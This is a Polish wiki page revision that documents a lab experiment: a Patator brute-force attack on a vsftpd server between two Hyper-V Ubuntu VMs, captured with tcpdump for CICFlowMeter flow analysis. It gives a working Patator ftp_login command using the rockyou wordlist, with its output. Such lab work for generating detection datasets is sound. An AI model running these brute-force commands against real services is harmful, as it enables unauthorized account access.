notatki:ftp_bruteforce

Differences

Differences between the selected revision and the current version.

notatki:ftp_bruteforce [2025/06/19 16:10] administrator | notatki:ftp_bruteforce [2025/06/19 20:09] (current) administrator
Linia 1: Linia 1:
-====== FTP Bruteforce ======+====== Security: FTP Bruteforce (Patator i CICFlowMeter) ======
  
 ===== Schemat i opis środowiska testowego ===== ===== Schemat i opis środowiska testowego =====
Linia 5: Linia 5:
 <diagram><svg xmlns="http://www.w3.org/2000/svg" style="background: transparent; background-color: transparent; color-scheme: light dark;" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="263px" height="224px" viewBox="-0.5 -0.5 263 224" content="&lt;mxfile host=&quot;wiki.ostrowski.net.pl&quot; agent=&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0&quot; version=&quot;26.2.15&quot;&gt;&lt;diagram id=&quot;gtjQNWmoT4qQz-VoZcrC&quot; name=&quot;Page-1&quot;&gt;7VhtT9swEP41/bgor7T92DcYEmMIkLZ9QiYxiYcTR86lL/v1OydOk9SBMVHBJqFGrf3c+ey753zXduQt0u2ZJHnyRUSUj1w72o685ch1J06A7wrY1YB/ooFYsqiGnBa4Yb+oBm2NliyiRU8RhODA8j4YiiyjIfQwIqXY9NUeBO/vmpOYGsBNSLiJfmMRJNqtwG7xz5TFSbOzY2tJShplDRQJicSmA3mrkbeQQkA9SrcLylXsmrjU606fkO4PJmkGL1ng1gvWhJfat1siYwoj94Sjgfm9xFGsRo5t6Qetub4+PuyamOw9sVE5IkVCIz1JIOU4dHBYgBSPdCG4kIhkIsPF8wfGeQONXM/3p0GlzMk95VeiYMBEhrIQfaKoNF9TCQzZuDhQuBcAIu0ozDiLlQBEjijRs70dUQJnGR6nyRJ1WvQjVy6l21jlrrWmlKSWG1lrJqEk/C4lYcKqg+vY4WZ0+2T8nT2reBuoSCnIHaroBU0e6IvgBF4937Rp5fvWpAaTTk75mgGiUznem27ZxoEmfJh8zyB/BkDCRyqfod/9oP+I9Dvvyf+JwSKNsM7pqZCQiFhkhK9adC5FmUV7bludC6GCXBH3kwLsdNEmJYh+DtAtg+96uRr/UGMr0LPltiNa7jqTKyoZeqiYq7EsmqlS3iZSAUTCKVPuVhq1d8ql59nBCIhShlpLxxXqMtgWSZNDSTkBtu5bfw0f4/fkw/l/+PDeiA/fqI/nl7efLle3ZvV7pBAm2s9csAyqbYM5PrZlq+87i/3nKMAli0oynfxJoj87ksaaKXFroA8OYWMTdCqbbjAADmHjw70rwBnY+xBzB8BBkwN72weHxOcF7aCT7E90hiKvG8AD26qrZLaKilIqV2taM+sMdIqQFaFwppasbM1zeR5W5+DuXbFhVXoc9rrTmXoZjRElth3YY+84TcYxmoxtNJkG6raYBnvNFZoYV+V4DcQKgl7Nmv47RSt4vyYy/Yj4G7eJwGgT8+vz5dnK/BJ9+xX1sIesroeaCFrFH7C0U1pCLkpVjzYJA3qTk8rZDVabPj9HqBHjoF8izArhuAMlYvL3JQKn7c/bStb5j8Bb/QY=&lt;/diagram&gt;&lt;/mxfile&gt;"><defs/><g><g data-cell-id="0"><g data-cell-id="1"><g data-cell-id="2"><g><path d="M 14 187 L 14 143 L 58.8 143 L 58.8 187 Z" fill="#4495d1" style="fill: light-dark(rgb(68, 149, 209), rgb(61, 131, 183));" stroke="none" pointer-events="all"/><path d="M 35.25 171.3 L 36.02 159.39 L 39.71 159.39 L 42 166.98 L 44.48 159.39 L 48.09 159.39 L 48.74 171.3 
L 46.06 171.3 L 45.7 162.24 L 42.85 171.3 L 40.68 171.3 L 38.25 162.44 L 37.79 171.3 Z M 26.88 171.3 L 22.94 159.39 L 25.97 159.39 L 28.57 168.21 L 31.28 159.39 L 34.21 159.39 L 30.09 171.3 Z" fill="#ffffff" style="fill: light-dark(rgb(255, 255, 255), rgb(18, 18, 18));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 194px; margin-left: 36px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">Target<br />10.10.10.1/24</div></div></div></foreignObject><text x="36" y="206" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">Target...</text></switch></g></g></g><g data-cell-id="3"><g><path d="M 204 187 L 204 143 L 248.8 143 L 248.8 187 Z" fill="#4495d1" style="fill: light-dark(rgb(68, 149, 209), rgb(61, 131, 183));" stroke="none" pointer-events="all"/><path d="M 225.25 171.3 L 226.02 159.39 L 229.71 159.39 L 232 166.98 L 234.48 159.39 L 238.09 159.39 L 238.74 171.3 L 236.06 171.3 L 235.7 162.24 L 232.85 171.3 L 230.68 171.3 L 228.25 162.44 L 227.79 171.3 Z M 216.88 171.3 L 212.94 159.39 L 215.97 159.39 L 218.57 168.21 L 221.28 159.39 L 224.21 159.39 L 220.09 171.3 Z" fill="#ffffff" style="fill: light-dark(rgb(255, 255, 255), rgb(18, 18, 18));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" 
width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 194px; margin-left: 226px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">Attacker<br />10.10.10.2/24</div></div></div></foreignObject><text x="226" y="206" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">Attacke...</text></switch></g></g></g><g data-cell-id="6"><g><path d="M 104 165 L 58.8 165" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="7"><g><path d="M 154 165 L 204 165" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="4"><g><rect x="104" y="140" width="50" height="50" fill="none" stroke="none" pointer-events="all"/><path d="M 107.07 140 C 105.38 140 104 141.37 104 143.05 L 104 186.95 C 104 188.63 105.38 190 107.07 190 L 150.93 190 C 152.62 190 154 188.63 154 186.95 L 154 143.05 C 154 141.37 152.62 140 150.93 140 Z" fill="#fafafa" style="fill: light-dark(rgb(250, 250, 250), rgb(22, 22, 22));" stroke="none" pointer-events="all"/><rect x="104" y="140" width="50" height="50" fill="none" stroke="none" pointer-events="all"/><path d="M 127.38 180.52 L 127.38 176.53 L 116.78 176.53 L 116.78 173.39 L 107.75 178.71 L 116.78 183.96 L 116.78 180.52 Z M 132.32 161.46 L 132.32 157.48 L 121.73 157.48 L 121.73 154.33 L 112.7 159.66 L 121.73 164.9 L 121.73 161.46 Z M 126.38 171.06 L 126.38 167.08 L 136.98 
167.08 L 136.98 163.93 L 146 169.26 L 136.98 174.51 L 136.98 171.06 Z M 130.96 152.32 L 130.96 148.34 L 141.55 148.34 L 141.55 145.2 L 150.58 150.52 L 141.55 155.77 L 141.55 152.32 Z M 107.07 140 C 105.38 140 104 141.37 104 143.05 L 104 186.95 C 104 188.63 105.38 190 107.07 190 L 150.93 190 C 152.62 190 154 188.63 154 186.95 L 154 143.05 C 154 141.37 152.62 140 150.93 140 Z M 107.07 141.38 L 150.93 141.38 C 151.88 141.38 152.62 142.11 152.62 143.05 L 152.62 186.95 C 152.62 187.89 151.88 188.62 150.93 188.62 L 107.07 188.62 C 106.12 188.62 105.38 187.89 105.38 186.95 L 105.38 143.05 C 105.38 142.11 106.12 141.38 107.07 141.38 Z" fill="#005073" style="fill: light-dark(rgb(0, 80, 115), rgb(124, 193, 223));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 197px; margin-left: 129px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">INT-NET</div></div></div></foreignObject><text x="129" y="209" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">INT-NET</text></switch></g></g></g><g data-cell-id="8"><g><path d="M 135 76 L 58.8 144.78" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="9"><g><path d="M 135 76 L 204 143.19" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 
255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="5"><g><path d="M 99 20 C 75 20 69 40 88.2 44 C 69 52.8 90.6 72 106.2 64 C 117 80 153 80 165 64 C 189 64 189 48 174 40 C 189 24 165 8 144 16 C 129 4 105 4 99 20 Z" fill="#ffffff" style="fill: light-dark(#ffffff, var(--ge-dark-color, #121212)); stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe center; justify-content: unsafe center; width: 118px; height: 1px; padding-top: 40px; margin-left: 70px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: normal; word-wrap: normal; ">BRIDGE<br />TO INTERNET</div></div></div></foreignObject><text x="129" y="44" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">BRIDGE...</text></switch></g></g></g></g></g></g></svg></diagram> <diagram><svg xmlns="http://www.w3.org/2000/svg" style="background: transparent; background-color: transparent; color-scheme: light dark;" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="263px" height="224px" viewBox="-0.5 -0.5 263 224" content="&lt;mxfile host=&quot;wiki.ostrowski.net.pl&quot; agent=&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0&quot; version=&quot;26.2.15&quot;&gt;&lt;diagram id=&quot;gtjQNWmoT4qQz-VoZcrC&quot; 
name=&quot;Page-1&quot;&gt;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&lt;/diagram&gt;&lt;/mxfile&gt;"><defs/><g><g data-cell-id="0"><g data-cell-id="1"><g data-cell-id="2"><g><path d="M 14 187 L 14 143 L 58.8 143 L 58.8 187 Z" fill="#4495d1" style="fill: light-dark(rgb(68, 149, 209), rgb(61, 131, 183));" stroke="none" pointer-events="all"/><path d="M 35.25 171.3 L 36.02 159.39 L 39.71 159.39 L 42 166.98 L 44.48 159.39 L 48.09 159.39 L 48.74 171.3 L 46.06 171.3 L 45.7 162.24 L 42.85 171.3 L 40.68 171.3 L 38.25 162.44 L 37.79 171.3 Z M 26.88 171.3 L 22.94 159.39 L 25.97 159.39 L 28.57 168.21 L 31.28 159.39 L 34.21 159.39 L 30.09 171.3 Z" fill="#ffffff" style="fill: light-dark(rgb(255, 255, 255), rgb(18, 18, 18));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 194px; margin-left: 36px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">Target<br />10.10.10.1/24</div></div></div></foreignObject><text x="36" y="206" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">Target...</text></switch></g></g></g><g data-cell-id="3"><g><path d="M 204 187 L 204 143 L 248.8 143 L 248.8 187 Z" fill="#4495d1" style="fill: light-dark(rgb(68, 149, 209), rgb(61, 131, 183));" stroke="none" pointer-events="all"/><path d="M 225.25 171.3 L 226.02 159.39 L 229.71 159.39 L 232 166.98 L 234.48 159.39 L 238.09 159.39 L 238.74 
171.3 L 236.06 171.3 L 235.7 162.24 L 232.85 171.3 L 230.68 171.3 L 228.25 162.44 L 227.79 171.3 Z M 216.88 171.3 L 212.94 159.39 L 215.97 159.39 L 218.57 168.21 L 221.28 159.39 L 224.21 159.39 L 220.09 171.3 Z" fill="#ffffff" style="fill: light-dark(rgb(255, 255, 255), rgb(18, 18, 18));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 194px; margin-left: 226px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">Attacker<br />10.10.10.2/24</div></div></div></foreignObject><text x="226" y="206" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">Attacke...</text></switch></g></g></g><g data-cell-id="6"><g><path d="M 104 165 L 58.8 165" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="7"><g><path d="M 154 165 L 204 165" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="4"><g><rect x="104" y="140" width="50" height="50" fill="none" stroke="none" pointer-events="all"/><path d="M 107.07 140 C 105.38 140 104 141.37 104 143.05 L 104 186.95 C 104 188.63 105.38 190 107.07 190 L 150.93 190 C 152.62 190 154 188.63 154 186.95 L 154 143.05 C 154 141.37 152.62 140 150.93 140 Z" fill="#fafafa" 
style="fill: light-dark(rgb(250, 250, 250), rgb(22, 22, 22));" stroke="none" pointer-events="all"/><rect x="104" y="140" width="50" height="50" fill="none" stroke="none" pointer-events="all"/><path d="M 127.38 180.52 L 127.38 176.53 L 116.78 176.53 L 116.78 173.39 L 107.75 178.71 L 116.78 183.96 L 116.78 180.52 Z M 132.32 161.46 L 132.32 157.48 L 121.73 157.48 L 121.73 154.33 L 112.7 159.66 L 121.73 164.9 L 121.73 161.46 Z M 126.38 171.06 L 126.38 167.08 L 136.98 167.08 L 136.98 163.93 L 146 169.26 L 136.98 174.51 L 136.98 171.06 Z M 130.96 152.32 L 130.96 148.34 L 141.55 148.34 L 141.55 145.2 L 150.58 150.52 L 141.55 155.77 L 141.55 152.32 Z M 107.07 140 C 105.38 140 104 141.37 104 143.05 L 104 186.95 C 104 188.63 105.38 190 107.07 190 L 150.93 190 C 152.62 190 154 188.63 154 186.95 L 154 143.05 C 154 141.37 152.62 140 150.93 140 Z M 107.07 141.38 L 150.93 141.38 C 151.88 141.38 152.62 142.11 152.62 143.05 L 152.62 186.95 C 152.62 187.89 151.88 188.62 150.93 188.62 L 107.07 188.62 C 106.12 188.62 105.38 187.89 105.38 186.95 L 105.38 143.05 C 105.38 142.11 106.12 141.38 107.07 141.38 Z" fill="#005073" style="fill: light-dark(rgb(0, 80, 115), rgb(124, 193, 223));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 197px; margin-left: 129px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">INT-NET</div></div></div></foreignObject><text x="129" y="209" 
fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">INT-NET</text></switch></g></g></g><g data-cell-id="8"><g><path d="M 135 76 L 58.8 144.78" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="9"><g><path d="M 135 76 L 204 143.19" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="5"><g><path d="M 99 20 C 75 20 69 40 88.2 44 C 69 52.8 90.6 72 106.2 64 C 117 80 153 80 165 64 C 189 64 189 48 174 40 C 189 24 165 8 144 16 C 129 4 105 4 99 20 Z" fill="#ffffff" style="fill: light-dark(#ffffff, var(--ge-dark-color, #121212)); stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe center; justify-content: unsafe center; width: 118px; height: 1px; padding-top: 40px; margin-left: 70px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: normal; word-wrap: normal; ">BRIDGE<br />TO INTERNET</div></div></div></foreignObject><text x="129" y="44" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">BRIDGE...</text></switch></g></g></g></g></g></g></svg></diagram>
  
 +Opis:
  
 +Środowisko składa się z dwóch maszyn wirtualnych (VM) działających na Ubuntu Server:
 +
 +  * Maszyna atakująca: uruchomiony program Patator do ataku brute-force na usługę FTP oraz tcpdump do przechwytywania ruchu.
 +  * Maszyna ofiara: zainstalowany i skonfigurowany serwer FTP (vsftpd).
 +  * Sieć: maszyny podłączone do tego samego switcha wirtualnego w Hyper-V.
 +
 +Każda z Maszyn ma dysk o rozmiarze 8GB ([[https://documentation.ubuntu.com/server/reference/installation/system-requirements/|Wymagania minimalne ubuntu]] mówią o minimalnie 5GB). Dyski są w formacie vhdx, wykorzystywanym przez hyper-v.
 +
 +Dyski maszyn można pobrać z linka poniżej:\\
 +https://1drv.ms/f/c/9dd28f74d9c48b45/ElEe6P0-WYpOmB3YukiRtzwBVGtNNW8QbW3jmy5V-9PWPQ?e=RSLSO4\\
 +Hasło do linka: ''Ostrowski19062025''
 +
 +===== Oprogramowanie wykorzystane do wykonania eksperymentu =====
 +
 +^ Komponent                             ^ Wersja                     ^ Nazwa          ^
 +| System operacyjny maszyn wirtualnych  | 24.04.2 LTS                | Ubuntu Server  |
 +| Hypervisor                            | Wersja: 10.0.26100.1882    | Hyper-V        |
 +| Serwer FTP                            | 3.0.5                      | VSFTPD         |
 +| Narzędzie ataku                       | 1.0                        | Patator        |
 +| Przechwytywanie ruchu                 | 4.99.1                     | tcpdump        |
 +| Analiza Ruchu                         | 0.4.2                      | CICFlowMeter   |
 +| Słownik do ataku                      | ok. 14 MB, 14344392 haseł  | rockyou.txt    |
 +
 +====== Instalacja i konfiguracja ======
 +
 +===== Maszyna ofiara =====
 +
 +<code bash>
 +administrator@target:~$ sudo apt update -y
 +[sudo] password for administrator:
 +Hit:1 http://security.ubuntu.com/ubuntu noble-security InRelease
 +Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
 +Hit:3 http://archive.ubuntu.com/ubuntu noble-updates InRelease
 +Hit:4 http://archive.ubuntu.com/ubuntu noble-backports InRelease
 +Reading package lists... Done
 +Building dependency tree... Done
 +Reading state information... Done
 +58 packages can be upgraded. Run 'apt list --upgradable' to see them.
 +administrator@target:~$ sudo apt install vsftpd -y
 +[LOGI Z INSTALACJI]
 +</code>
 +
 +Zmiany w pliku konfiguracyjnym ''/etc/vsftpd.conf'':\\
 +<code bash>
 +anonymous_enable=NO
 +local_enable=YES
 +write_enable=YES
 +listen=YES
 +listen_ipv6=NO
 +</code>
 +
 +Tworzenie użytkownika FTP z hasłem ''a7s8d6a8s7d6a8s7d68s7'':\\
 +<code bash>
 +administrator@target:~$ sudo adduser ftpuser
 +info: Adding user `ftpuser' ...
 +info: Selecting UID/GID from range 1000 to 59999 ...
 +info: Adding new group `ftpuser' (1001) ...
 +info: Adding new user `ftpuser' (1001) with group `ftpuser (1001)' ...
 +info: Creating home directory `/home/ftpuser' ...
 +info: Copying files from `/etc/skel' ...
 +New password:
 +Retype new password:
 +passwd: password updated successfully
 +Changing the user information for ftpuser
 +Enter the new value, or press ENTER for the default
 +        Full Name []:
 +        Room Number []:
 +        Work Phone []:
 +        Home Phone []:
 +        Other []:
 +Is the information correct? [Y/n] y
 +info: Adding new user `ftpuser' to supplemental / extra groups `users' ...
 +info: Adding user `ftpuser' to group `users' ...
 +administrator@target:~$
 +</code>
 +
 +Restart usługi:\\
 +<code bash>
 +administrator@target:~$ sudo systemctl restart vsftpd
 +administrator@target:~$ sudo systemctl status vsftpd.service
 +● vsftpd.service - vsftpd FTP server
 +     Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; enabled; preset: e>
 +     Active: active (running) since Thu 2025-06-19 15:00:47 UTC; 6s ago
 +    Process: 4065 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited>
 +   Main PID: 4068 (vsftpd)
 +      Tasks: 1 (limit: 4602)
 +     Memory: 704.0K (peak: 1.5M)
 +        CPU: 7ms
 +     CGroup: /system.slice/vsftpd.service
 +             └─4068 /usr/sbin/vsftpd /etc/vsftpd.conf
 +
 +Jun 19 15:00:47 target systemd[1]: Starting vsftpd.service - vsftpd FTP server.>
 +Jun 19 15:00:47 target systemd[1]: Started vsftpd.service - vsftpd FTP server.
 +administrator@target:~$
 +</code>
 +
 +===== Maszyna atakująca =====
 +
 +Instalacja Narzędzi:\\
 +<code bash>
 +administrator@attacker:~$ sudo apt update -y
 +[sudo] password for administrator:
 +Hit:1 http://security.ubuntu.com/ubuntu noble-security InRelease
 +Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
 +Hit:3 http://archive.ubuntu.com/ubuntu noble-updates InRelease
 +Hit:4 http://archive.ubuntu.com/ubuntu noble-backports InRelease
 +Reading package lists... Done
 +Building dependency tree... Done
 +Reading state information... Done
 +58 packages can be upgraded. Run 'apt list --upgradable' to see them.
 +administrator@attacker:~$ sudo apt install git python3-pip tcpdump -y
 +[TUTAJ LOGI Z INSTALACJI]
 +</code>
 +
 +Przed instalacją patatora dodano repozytoria kali-linux do ubuntu.\\
 +Instalacja Patatora:\\
 +<code bash>
 +administrator@attacker:~$ sudo apt install patator -y
 +[TUTAJ LOGI Z INSTALACJI]
 +</code>
 +
 +Instalacja CICFlowMeter w wersji Python:\\
 +<code bash>
 +administrator@attacker:~/patator$ pip install cicflowmeter
 +[TUTAJ LOGI Z INSTALACJI]
 +</code>
 +
 +Pobranie słownika do ataku:\\
 +<code bash>
 +administrator@attacker:~$ wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
 +--2025-06-19 15:19:13--  https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
 +Resolving github.com (github.com)... 140.82.121.3
 +Connecting to github.com (github.com)|140.82.121.3|:443... connected.
 +HTTP request sent, awaiting response... 302 Found
 +Location: https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz [following]
 +--2025-06-19 15:19:14--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
 +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
 +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
 +HTTP request sent, awaiting response... 200 OK
 +Length: 53291283 (51M) [application/octet-stream]
 +Saving to: ‘rockyou.txt.tar.gz’
 +
 +rockyou.txt.tar.gz                                  100%[=================================================================================================================> 50.82M  1.56MB/   in 32s
 +
 +2025-06-19 15:19:48 (1.59 MB/s) - ‘rockyou.txt.tar.gz’ saved [53291283/53291283]
 +
 +administrator@attacker:~$ tar -xzf rockyou.txt.tar.gz
 +administrator@attacker:~$ wc -l rockyou.txt #liczba haseł około 14 milionów
 +14344391 rockyou.txt
 +administrator@attacker:~$ head rockyou.txt #pierwsze wpisy w pliku
 +123456
 +12345
 +123456789
 +password
 +iloveyou
 +princess
 +1234567
 +rockyou
 +12345678
 +abc123
 +</code>
 +
 +====== Test Komunikacji ======
 +Ping:\\
 +<code bash>
 +administrator@target:~$ ping 10.10.10.2
 +PING 10.10.10.2 (10.10.10.2) 56(84) bytes of data.
 +64 bytes from 10.10.10.2: icmp_seq=1 ttl=64 time=0.180 ms
 +64 bytes from 10.10.10.2: icmp_seq=2 ttl=64 time=0.229 ms
 +64 bytes from 10.10.10.2: icmp_seq=3 ttl=64 time=0.269 ms
 +64 bytes from 10.10.10.2: icmp_seq=4 ttl=64 time=0.286 ms
 +64 bytes from 10.10.10.2: icmp_seq=5 ttl=64 time=0.266 ms
 +64 bytes from 10.10.10.2: icmp_seq=6 ttl=64 time=0.293 ms
 +64 bytes from 10.10.10.2: icmp_seq=7 ttl=64 time=0.284 ms
 +^C
 +--- 10.10.10.2 ping statistics ---
 +7 packets transmitted, 7 received, 0% packet loss, time 6182ms
 +rtt min/avg/max/mdev = 0.180/0.258/0.293/0.037 ms
 +administrator@target:~$
 +</code>
 +FTP:\\
 +<code bash>
 +administrator@attacker:~$ ftp 10.10.10.1
 +Connected to 10.10.10.1.
 +220 (vsFTPd 3.0.5)
 +Name (10.10.10.1:administrator): ftpuser
 +331 Please specify the password.
 +Password:
 +230 Login successful.
 +Remote system type is UNIX.
 +Using binary mode to transfer files.
 +ftp> dir
 +229 Entering Extended Passive Mode (|||8296|)
 +150 Here comes the directory listing.
 +226 Directory send OK.
 +ftp>
 +</code>
 +
 +====== Przeprowadzenie Ataku ======
 +
 +W jednej sesji terminala uruchomienie przechwytywania:\\
 +<code bash>
 +sudo tcpdump -i eth1 port 21 -w ftp_attack.pcap
 +</code>
 +
 +W drugiej sesji terminala atak Patator:\\
 +<code bash>
 +administrator@attacker:~$ patator ftp_login host=10.10.10.1 user=ftpuser password=FILE0 0=rockyou.txt -x ignore:mesg='Login incorrect' --rate-limit=50
 +15:39:45 patator    INFO - Starting Patator 1.0 (https://github.com/lanjelot/patator) with python-3.12.3 at 2025-06-19 15:39 UTC
 +15:39:45 patator    INFO -
 +15:39:45 patator    INFO - code  size    time | candidate                          |   num | mesg
 +15:39:45 patator    INFO - -----------------------------------------------------------------------------
 +15:40:38 patator    INFO - 530   16     2.772 | 123456                                 1 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.778 | 12345                              |     2 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.785 | 123456789                          |     3 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.770 | password                               4 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.770 | iloveyou                               5 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.786 | princess                               6 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.776 | 1234567                            |     7 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.773 | rockyou                            |     8 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.784 | 12345678                               9 | Login incorrect.
 +15:40:38 patator    INFO - 530   16     2.778 | abc123                                10 | Login incorrect.
 +[TUTAJ CIĄGNIE SIĘ DALEJ]
 +</code>
 +
 +  * ''--rate-limit=50'': ogranicza tempo ataku do 50 prób/sekundę (by nie przytłoczyć serwera)
 +  * ''rockyou.txt'': używa ogólnodostępnego słownika
 +
 +<WRAP center round important 60%>
